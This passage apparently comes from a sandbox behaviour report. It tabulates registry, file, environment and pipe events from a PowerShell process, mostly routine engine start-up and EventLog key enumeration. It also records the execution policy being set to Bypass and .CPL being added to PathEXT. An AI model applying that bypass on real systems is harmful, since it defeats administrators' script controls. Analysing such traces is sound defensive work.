| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{5037b0a0-3a31-5cd2-ff19-103e9f160a74} |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = TZI, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time, value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\en-US\tzres.dll.mui, base_address = 0x20801580001 |
|
3 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| File | Create Pipe | pipe_name = \device\namedpipe\pshost.131654663177492805.3736.defaultappdomain.powershell, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| Environment | Get Environment String | name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Set Environment String | name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1, size = 1 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1, size = 1 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 537 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
33 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3055 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 17, size_out = 0 |
|
1 | |
